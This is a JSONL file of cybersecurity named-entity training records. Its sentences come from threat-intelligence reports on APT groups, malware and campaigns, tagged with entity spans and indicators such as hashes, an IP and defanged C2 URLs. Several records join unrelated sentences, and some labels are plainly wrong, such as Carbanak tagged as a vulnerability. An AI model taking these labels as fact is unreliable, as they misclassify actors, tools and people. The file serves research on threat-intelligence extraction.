{"text": "However , the following email domains do not use Google mail servers and may have been targeted by other means :", "spans": {"TOOL: email": [[24, 29]], "ORGANIZATION: Google": [[49, 55]]}, "info": {"id": "cyberner_stix_train_004114", "source": "cyberner_stix_train"}}
{"text": "Translate the client response object into the server version of the client response object .", "spans": {}, "info": {"id": "cyberner_stix_train_004115", "source": "cyberner_stix_train"}}
{"text": "Money then disappears from the victim ’ s account and is cashed in without the owner ’ s knowledge . In the past , we have seen the group using open-source password dumpers such as Mimikatz . It exports the following functions , which are examined in greater detail below : DllMain Install UnInstall ServiceMain ShellMain ShellMainThread zxFunction001 zxFunction002 . An attacker with access to a valid cookie can establish an authenticated session to the NetScaler appliance without knowledge of the username , password , or access to a multi - factor authentication token or device .", "spans": {"TOOL: open-source password dumpers": [[144, 172]], "TOOL: Mimikatz": [[181, 189]], "THREAT_ACTOR: An attacker": [[368, 379]]}, "info": {"id": "cyberner_stix_train_004116", "source": "cyberner_stix_train"}}
{"text": "Disturbingly , the malware establishes a rootkit on the device , allowing it to download and execute any code a cybercriminal would want to run on a device . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials .", "spans": {"THREAT_ACTOR: PLATINUM": [[158, 166]], "ORGANIZATION: specific individuals": [[240, 260]], "VULNERABILITY: zero-day exploits": [[301, 318]], "THREAT_ACTOR: APT10": [[397, 402]], "MALWARE: MSP": [[435, 438]], "ORGANIZATION: MSPs": [[465, 469]]}, "info": {"id": "cyberner_stix_train_004117", "source": "cyberner_stix_train"}}
{"text": "A journey to Zebrocy land .", "spans": {"MALWARE: Zebrocy": [[13, 20]]}, "info": {"id": "cyberner_stix_train_004118", "source": "cyberner_stix_train"}}
{"text": "Infection The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . The purpose is to be executed only once and steal data on the infected system , here are the main features : Keyloggers , Clipboard stealer , Firefox profiles and cookies stealer , Chrome profiles and cookies stealer , Opera profiles and cookies stealer .", "spans": {"ORGANIZATION: FireEye": [[123, 130]], "ORGANIZATION: Firefox": [[346, 353]], "ORGANIZATION: Chrome": [[385, 391]], "ORGANIZATION: Opera": [[423, 428]]}, "info": {"id": "cyberner_stix_train_004119", "source": "cyberner_stix_train"}}
{"text": "The sub-function to decrypt the content skips the first 4 bytes , suggesting that the first four bytes of the downloaded content is in cleartext ( most likely the “ FWS ” or “ CWS ” header to look legitimate ) .", "spans": {"TOOL: FWS": [[165, 168]], "TOOL: CWS": [[176, 179]]}, "info": {"id": "cyberner_stix_train_004121", "source": "cyberner_stix_train"}}
{"text": "CloudDuke is a malware toolset known to consist of , at least , a downloader , a loader and two backdoor variants .", "spans": {"MALWARE: CloudDuke": [[0, 9]], "TOOL: downloader": [[66, 76]], "TOOL: loader": [[81, 87]]}, "info": {"id": "cyberner_stix_train_004122", "source": "cyberner_stix_train"}}
{"text": "While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities .", "spans": {"TOOL: InPage software": [[40, 55]], "ORGANIZATION: Unit42": [[110, 116]], "VULNERABILITY: InPage exploits": [[139, 154]], "ORGANIZATION: Kaspersky": [[250, 259]]}, "info": {"id": "cyberner_stix_train_004123", "source": "cyberner_stix_train"}}
{"text": "Additionally , CTU researchers have observed evidence of BRONZE PRESIDENT targeting political and law enforcement organizations in countries adjacent to the PRC , including Mongolia and India .", "spans": {"ORGANIZATION: CTU": [[15, 18]], "THREAT_ACTOR: BRONZE PRESIDENT": [[57, 73]], "ORGANIZATION: PRC": [[157, 160]]}, "info": {"id": "cyberner_stix_train_004124", "source": "cyberner_stix_train"}}
{"text": "The overlap between the HenBox and 9002 malware families Unit 42 has seen involves three shared C2s between several samples ; the first IP below is used for more than half of the HenBox samples we have seen to date : 47.90.81 [ . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": {"MALWARE: HenBox": [[24, 30], [179, 185]], "MALWARE: 9002": [[35, 39]], "THREAT_ACTOR: APT41": [[230, 235]], "THREAT_ACTOR: Dukes": [[465, 470]]}, "info": {"id": "cyberner_stix_train_004125", "source": "cyberner_stix_train"}}
{"text": "After getting a command from the C & C , the app is able to download a malicious payload in the form of a .dex file that is being dynamically loaded adding the additional malicious capabilities . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam . GandCrab Variant d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 ce1ee671fe5246a9c40b624ef97e4de1 GandCrab Variant aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 07f955796a252771861c8e0db06b1f01 GandCrab Variant 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec 4fcd0d13ea669a83a749ae5bfb098ca2 GandCrab Variant 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 8ec87fd3ea777fa8d5160dc957e6683e GandCrab Variant e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 c7d5077960882259b85c01fd41c49ffd . Then it calls with invalid value 69 .", "spans": {"ORGANIZATION: Volexity": [[202, 210], [285, 293]], "THREAT_ACTOR: threat actor": [[270, 282]], "THREAT_ACTOR: OceanLotus": [[347, 357]], "MALWARE: GandCrab": [[395, 403], [510, 518], [625, 633], [740, 748], [855, 863]], "FILEPATH: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[412, 476]], "FILEPATH: ce1ee671fe5246a9c40b624ef97e4de1": [[477, 509]], "FILEPATH: aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8": [[527, 591]], "FILEPATH: 07f955796a252771861c8e0db06b1f01": [[592, 624]], "FILEPATH: 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec": [[642, 706]], "FILEPATH: 4fcd0d13ea669a83a749ae5bfb098ca2": [[707, 739]], "FILEPATH: 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0": [[757, 821]], "FILEPATH: 8ec87fd3ea777fa8d5160dc957e6683e": [[822, 854]], "FILEPATH: e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776": [[872, 936]], "FILEPATH: c7d5077960882259b85c01fd41c49ffd": [[937, 969]]}, "info": {"id": "cyberner_stix_train_004126", "source": "cyberner_stix_train"}}
{"text": "Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn ’ t present on their device . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . Before the service is started ChangeServiceConfig is called to modify the service type to shared and interactive . Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"TOOL: Open Babel": [[390, 400]]}, "info": {"id": "cyberner_stix_train_004127", "source": "cyberner_stix_train"}}
{"text": "As such , this decision does not necessarily refer to a specific institution , but rather a collection of observations and behaviors observed across multiple , similarly-situated victims .", "spans": {}, "info": {"id": "cyberner_stix_train_004128", "source": "cyberner_stix_train"}}
{"text": "But it would appear that BLU only took action after Kryptowire notified it along with Google , Adups and Amazon . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The group is responsible for the campaign known as Operation Wilted Tulip .", "spans": {"ORGANIZATION: BLU": [[25, 28]], "ORGANIZATION: Kryptowire": [[52, 62]], "ORGANIZATION: Google": [[86, 92]], "ORGANIZATION: Adups": [[95, 100]], "ORGANIZATION: Amazon": [[105, 111]], "ORGANIZATION: Check Point": [[236, 247]]}, "info": {"id": "cyberner_stix_train_004129", "source": "cyberner_stix_train"}}
{"text": "If users or administrators detect the custom tools indicative of HIDDEN COBRA , these tools should be immediately flagged , reported to the DHS National Cybersecurity Communications and Integration Center ( NCCIC ) or the FBI Cyber Watch ( CyWatch ) , and given highest priority for enhanced mitigation .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[65, 77]], "ORGANIZATION: DHS": [[140, 143]], "ORGANIZATION: National Cybersecurity Communications and Integration Center": [[144, 204]], "ORGANIZATION: NCCIC": [[207, 212]], "ORGANIZATION: FBI": [[222, 225]]}, "info": {"id": "cyberner_stix_train_004130", "source": "cyberner_stix_train"}}
{"text": "Likewise , many of CosmicDuke ’s persistence components use techniques also used by components associated with GeminiDuke and CozyDuke .", "spans": {"MALWARE: CosmicDuke": [[19, 29]], "MALWARE: GeminiDuke": [[111, 121]], "MALWARE: CozyDuke": [[126, 134]]}, "info": {"id": "cyberner_stix_train_004131", "source": "cyberner_stix_train"}}
{"text": "Two of the four domains that have been hosted at this IP since 2016 — upfile2box.com and 7aga.net — were registered by a freelance web developer in Gaza , Palestine .", "spans": {"DOMAIN: upfile2box.com": [[70, 84]], "DOMAIN: 7aga.net": [[89, 97]]}, "info": {"id": "cyberner_stix_train_004132", "source": "cyberner_stix_train"}}
{"text": "The overlays are activated by the malicious operator using the command changeActivity , as seen on step 5 of the activation cycle . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer . This particular sample is a loader that loads an encrypted payload for its functionality . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": {"THREAT_ACTOR: MuddyWater": [[132, 142]], "ORGANIZATION: government": [[396, 406]], "THREAT_ACTOR: Cl0p": [[470, 474]], "ORGANIZATION: several federal agencies": [[481, 505]]}, "info": {"id": "cyberner_stix_train_004133", "source": "cyberner_stix_train"}}
{"text": "Port 6206 : Skype extraction service . We don't know the exact date Suckfly stole the certificates from the South Korean organizations . The contents of the decoy documents seems to include : This was followed by an executable downloader and payload concealed in an image file , likely to make its detection more difficult .", "spans": {"SYSTEM: Skype": [[12, 17]]}, "info": {"id": "cyberner_stix_train_004135", "source": "cyberner_stix_train"}}
{"text": "In earlier versions , it operated with shell commands like this : Stealing WhatsApp encryption key with Busybox Social payload Actually , this is not a standalone payload file – in all the observed versions its code was compiled with exploit payload in one file ( ‘ poc_perm ’ , ‘ arrs_put_user ’ , ‘ arrs_put_user.o ’ ) . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Turla is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware .", "spans": {"MALWARE: Busybox Social payload": [[104, 126]], "THREAT_ACTOR: Attackers": [[323, 332]], "ORGANIZATION: political": [[411, 420]], "THREAT_ACTOR: Turla": [[450, 455]], "TOOL: leveraging in-house tools": [[526, 551]], "MALWARE: malware": [[556, 563]]}, "info": {"id": "cyberner_stix_train_004136", "source": "cyberner_stix_train"}}
{"text": "Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication . so TAU is looking for newer versions ANEL samples . Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman ’s messages — three years worth .", "spans": {"SYSTEM: Microsoft Defender": [[59, 77]], "SYSTEM: Android": [[94, 101]], "TOOL: IWebBrowser2 COM": [[182, 198]], "ORGANIZATION: TAU": [[249, 252]], "THREAT_ACTOR: ANEL": [[283, 287]], "ORGANIZATION: Ashley Madison": [[313, 327]]}, "info": {"id": "cyberner_stix_train_004137", "source": "cyberner_stix_train"}}
{"text": "The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "TOOL: web shell": [[42, 51]], "ORGANIZATION: users": [[184, 189]]}, "info": {"id": "cyberner_stix_train_004138", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 72.11.148.220 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 72.11.148.220": [[10, 23]]}, "info": {"id": "cyberner_stix_train_004139", "source": "cyberner_stix_train"}}
{"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and “ spaghetti code ” , which is a technique that aims to confuse disassembly programs . iDefense analysts have identified a campaign likely to be targeting members of— or those with affiliation or interest in—the ASEAN Defence Ministers ' Meeting ( ADMM ) . As far as we can tell , its dropper was downloaded over HTTPS from api.goallbandungtravel.com . The downloader uses managed AES ( Rijndael algorithm ) to decrypt the appended data which is then reflectively loaded as a byte array using the Assembly .", "spans": {"MALWARE: FinFisher": [[76, 85]], "ORGANIZATION: iDefense": [[269, 277]], "ORGANIZATION: Defence Ministers ' Meeting": [[400, 427]], "ORGANIZATION: ADMM": [[430, 434]], "DOMAIN: api.goallbandungtravel.com": [[506, 532]], "MALWARE: The downloader": [[535, 549]]}, "info": {"id": "cyberner_stix_train_004140", "source": "cyberner_stix_train"}}
{"text": "eSurv ’ s public marketing is centered around video surveillance software and image recognition systems , but there are a number of individuals claiming to be mobile security researchers working at the company , including one who has publically made claims to be developing a mobile surveillance agent . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": {"ORGANIZATION: eSurv": [[0, 5]], "VULNERABILITY: Carbanak": [[379, 387]], "THREAT_ACTOR: cyber-criminal gang": [[392, 411]], "ORGANIZATION: financial institutions": [[513, 535]], "TOOL: Microsoft Word": [[623, 637]], "TOOL: PowerShell": [[708, 718]], "TOOL: PS": [[721, 723]]}, "info": {"id": "cyberner_stix_train_004141", "source": "cyberner_stix_train"}}
{"text": "This report details our observations of APT28 ’s targeting , and our investigation into a related breach .", "spans": {"THREAT_ACTOR: APT28": [[40, 45]]}, "info": {"id": "cyberner_stix_train_004142", "source": "cyberner_stix_train"}}
{"text": "We believe the primary purpose of this tactic is an attempt at evading detection in the targeted network .", "spans": {}, "info": {"id": "cyberner_stix_train_004143", "source": "cyberner_stix_train"}}
{"text": "TrickMo uses accessibility services to identify and control some of these screens and make its own choices before giving the user a chance to react . Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 .", "spans": {"MALWARE: TrickMo": [[0, 7]], "THREAT_ACTOR: group": [[166, 171]], "TOOL: email credentials": [[226, 243]], "TOOL: personal information": [[246, 266]], "ORGANIZATION: technology organization": [[386, 409]]}, "info": {"id": "cyberner_stix_train_004144", "source": "cyberner_stix_train"}}
{"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": {"ORGANIZATION: government": [[37, 47]], "ORGANIZATION: Microsoft": [[152, 161]], "THREAT_ACTOR: PLATINUM": [[193, 201]], "ORGANIZATION: users": [[212, 217]]}, "info": {"id": "cyberner_stix_train_004145", "source": "cyberner_stix_train"}}
{"text": "The actor typically targets Central Asian countries , Russia , Belarus , Mongolia , and others .", "spans": {}, "info": {"id": "cyberner_stix_train_004146", "source": "cyberner_stix_train"}}
{"text": "In some deployments , we observed Sofacy actively developing and deploying a new package to a much smaller , specific subset of targets within the broader set .", "spans": {"THREAT_ACTOR: Sofacy": [[34, 40]]}, "info": {"id": "cyberner_stix_train_004147", "source": "cyberner_stix_train"}}
{"text": "Some of BRONZE PRESIDENT 's malware has persistence capabilities .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[8, 24]]}, "info": {"id": "cyberner_stix_train_004148", "source": "cyberner_stix_train"}}
{"text": "XLoader 6.0 also mirrors the way FakeSpy hides its real C & C server . FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors . This response tells the malware to: Set the file name for the data that will follow to 10140, Set the part number to 0, Parse response data, Set a 1 action for the next . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"MALWARE: XLoader 6.0": [[0, 11]], "MALWARE: FakeSpy": [[33, 40]], "THREAT_ACTOR: FANCY BEAR": [[71, 81]], "THREAT_ACTOR: Sofacy": [[98, 104]], "THREAT_ACTOR: APT 28": [[108, 114]], "THREAT_ACTOR: threat actor": [[145, 157]], "ORGANIZATION: Aerospace": [[270, 279]], "ORGANIZATION: Defense": [[282, 289]], "ORGANIZATION: Energy": [[292, 298]], "ORGANIZATION: Government": [[301, 311]], "ORGANIZATION: Media sectors": [[316, 329]], "ORGANIZATION: Talos researchers": [[503, 520]], "TOOL: Open Babel": [[569, 579]]}, "info": {"id": "cyberner_stix_train_004149", "source": "cyberner_stix_train"}}
{"text": "Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland . It expects the webpage to contain special HTML tags ; the backdoor will attempt to interpret the data between the tags as commands . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: FrozenCell": [[75, 85]], "ORGANIZATION: Kessem": [[101, 107]], "ORGANIZATION: banks": [[156, 161]], "ORGANIZATION: community banks": [[233, 248]], "ORGANIZATION: email service providers": [[253, 276]], "TOOL: HTML": [[331, 335]], "ORGANIZATION: Kaspersky": [[422, 431]], "MALWARE: the malware": [[491, 502]], "MALWARE: Winnti": [[525, 531]]}, "info": {"id": "cyberner_stix_train_004150", "source": "cyberner_stix_train"}}
{"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": {"MALWARE: entry": [[5, 10]], "TOOL: Reverse Engineering": [[74, 93]], "TOOL: Nick Harbour": [[96, 108]], "MALWARE: Powermud backdoor": [[164, 181]], "MALWARE: Backdoor.Powemuddy": [[201, 219]], "MALWARE: custom tools": [[228, 240]], "SYSTEM: Windows": [[341, 348]], "FILEPATH: makecab.exe": [[373, 384]]}, "info": {"id": "cyberner_stix_train_004151", "source": "cyberner_stix_train"}}
{"text": "The beaconing only starts after the application is installed and removed from the running tasks . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 . Between early December 2018 and the end of January 2019 , Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware S-MALon S-MALvictim systems . Ashley Madison ’s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison ’s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": {"TOOL: DustySky": [[98, 106]], "THREAT_ACTOR: Rancor": [[255, 261]], "ORGANIZATION: Ashley Madison": [[379, 393]], "ORGANIZATION: Maggie McNeill": [[531, 545]], "ORGANIZATION: Ashley Madison ’s": [[590, 607]]}, "info": {"id": "cyberner_stix_train_004152", "source": "cyberner_stix_train"}}
{"text": "This post does n't follow the chronological evolution of Zen , but instead covers relevant samples from least to most complex . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Moreover , the exploit dropped a different malware payload , a backdoor we refer to as ELMER . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": {"MALWARE: Zen": [[57, 60]], "VULNERABILITY: CVE-2012-0158": [[180, 193]], "TOOL: NetTraveler Trojan": [[205, 223]], "MALWARE: ELMER": [[313, 318]]}, "info": {"id": "cyberner_stix_train_004153", "source": "cyberner_stix_train"}}
{"text": "Once the user attempts to open the document , Microsoft Word immediately attempts to load the remote template containing a malicious macro and payload from the location specified within the settings.xml.rels file of the DOCX document .", "spans": {"ORGANIZATION: Microsoft": [[46, 55]], "TOOL: Word": [[56, 60]], "TOOL: malicious macro": [[123, 138]], "FILEPATH: settings.xml.rels": [[190, 207]], "TOOL: DOCX": [[220, 224]]}, "info": {"id": "cyberner_stix_train_004154", "source": "cyberner_stix_train"}}
{"text": "] 975685 [ . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm . Richard_Johnson.doc : 878e4e8677e68aba918d930f2cc67fbe 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080 . Based on the files ’ thumbnail images – the only content visible in the Windows Explorer window – the PowerPoint files imitate Ukraine ’s Ministry of Defence and Poland ’s Ministry of National Defence .", "spans": {"ORGANIZATION: citizens—journalists": [[21, 41]], "ORGANIZATION: software developers": [[44, 63]], "ORGANIZATION: politicians": [[66, 77]], "ORGANIZATION: researchers at universities": [[80, 107]], "ORGANIZATION: artists": [[114, 121]], "THREAT_ACTOR: Pawn Storm": [[143, 153]], "FILEPATH: Richard_Johnson.doc": [[156, 175]], "FILEPATH: 878e4e8677e68aba918d930f2cc67fbe": [[178, 210]], "FILEPATH: 0a3f915dd071e862046949885043b3ba61100b946cbc0d84ef7c44d77a50f080": [[211, 275]], "ORGANIZATION: Ukraine ’s Ministry of Defence": [[405, 435]], "ORGANIZATION: Poland ’s Ministry of National Defence": [[440, 478]]}, "info": {"id": "cyberner_stix_train_004155", "source": "cyberner_stix_train"}}
{"text": "The current dumpers have some similarities with those previously used by the group .", "spans": {}, "info": {"id": "cyberner_stix_train_004156", "source": "cyberner_stix_train"}}
{"text": "Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control .", "spans": {"MALWARE: Honeycomb": [[0, 9]], "TOOL: Word": [[252, 256]], "VULNERABILITY: CVE-2017-11882": [[295, 309]], "FILEPATH: 'NavShExt.dll'": [[376, 390]], "FILEPATH: iexplore.exe": [[421, 433]]}, "info": {"id": "cyberner_stix_train_004157", "source": "cyberner_stix_train"}}
{"text": "All the malicious Dvmap apps had the same functionality . Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits . Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites , it ’s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"MALWARE: Dvmap": [[18, 23]], "TOOL: COVELLITE malware": [[80, 97]], "TOOL: LAZARUS toolkits": [[132, 148]], "TOOL: OTA websites": [[253, 265]], "THREAT_ACTOR: Adversaries": [[375, 386]]}, "info": {"id": "cyberner_stix_train_004158", "source": "cyberner_stix_train"}}
{"text": "GeminiDuke also occasionally embeds additional executables that attempt to achieve persistence on the victim computer .", "spans": {"MALWARE: GeminiDuke": [[0, 10]]}, "info": {"id": "cyberner_stix_train_004159", "source": "cyberner_stix_train"}}
{"text": "BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms .", "spans": {"THREAT_ACTOR: BARIUM": [[0, 6]], "TOOL: social media platforms": [[159, 181]]}, "info": {"id": "cyberner_stix_train_004160", "source": "cyberner_stix_train"}}
{"text": "Sofacy continued to use DealersChoice throughout the fall of 2016 , which we also documented in our December 2016 publication discussing Sofacy ’s larger campaign .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6], [137, 143]], "TOOL: DealersChoice": [[24, 37]]}, "info": {"id": "cyberner_stix_train_004161", "source": "cyberner_stix_train"}}
{"text": "In a press briefing just two weeks ago , Deputy Attorney General Rod Rosenstein announced that the grand jury assembled by Special Counsel Robert Mueller had returned an indictment against 12 officers of Russia 's Main Intelligence Directorate of the Russian General Staff ( better known as Glavnoye razvedyvatel'noye upravleniye , or GRU ) .", "spans": {"ORGANIZATION: Glavnoye razvedyvatel'noye upravleniye": [[291, 329]], "ORGANIZATION: GRU": [[335, 338]]}, "info": {"id": "cyberner_stix_train_004162", "source": "cyberner_stix_train"}}
{"text": "Importantly , the backdoor simply will not reveal its malicious nature unless Arabic language keyboard and settings are found on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_004163", "source": "cyberner_stix_train"}}
{"text": "In addition , Kaspersky analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more . With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest . This paper will cover the discovery of this campaign , dubbed ‘Operation Sheep’ , and an analysis of SWAnalytics . In mid-September , an app named ‘Network Speed Master’ stood out on our radar with its rather unusual behavior patterns . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Operation Sheep is the first campaign we have observed in the wild that abuses similar concept since our MitD publication . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” . In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . In China alone , we have seen underground market sheep shavers” ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . In Operation Sheep’s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Webinjects targeting Japan , a country we haven’t seen targeted by Panda Banker before . Japan is no stranger to banking malware . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems . we found two malicious iOS applications in Operation Pawn Storm . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: DarkHotel": [[146, 155]], "ORGANIZATION: ITUC": [[186, 190]], "THREAT_ACTOR: Operation Kingphish": [[216, 235]], "MALWARE: social media": [[269, 281]], "MALWARE: prominently Facebook": [[284, 304]], "THREAT_ACTOR: Operation Sheep": [[635, 650], [2870, 2885]], "THREAT_ACTOR: ‘Operation Sheep’": [[868, 885], [2023, 2040]], "VULNERABILITY: exploit": [[972, 979], [1782, 1789]], "VULNERABILITY: Man-in-the-Disk": [[984, 999]], "MALWARE: SDK": [[1071, 1074]], "FILEPATH: SWAnalytics": [[1083, 1094], [1314, 1325], [2403, 2414], [2458, 2469], [2786, 2797], [3044, 3055], [3223, 3234]], "SYSTEM: Android": [[1133, 1140], [2491, 2498]], "ORGANIZATION: Tencent MyApp": [[1210, 1223]], "ORGANIZATION: Wandoujia": [[1226, 1235]], "ORGANIZATION: Huawei App Store": [[1238, 1254]], "ORGANIZATION: Xiaomi App Store": [[1261, 1277]], "THREAT_ACTOR: Shun Wang": [[1517, 1526], [1671, 1680], [3833, 3842]], "THREAT_ACTOR: ‘Network Speed Master’": [[2108, 2130]], "FILEPATH: module": 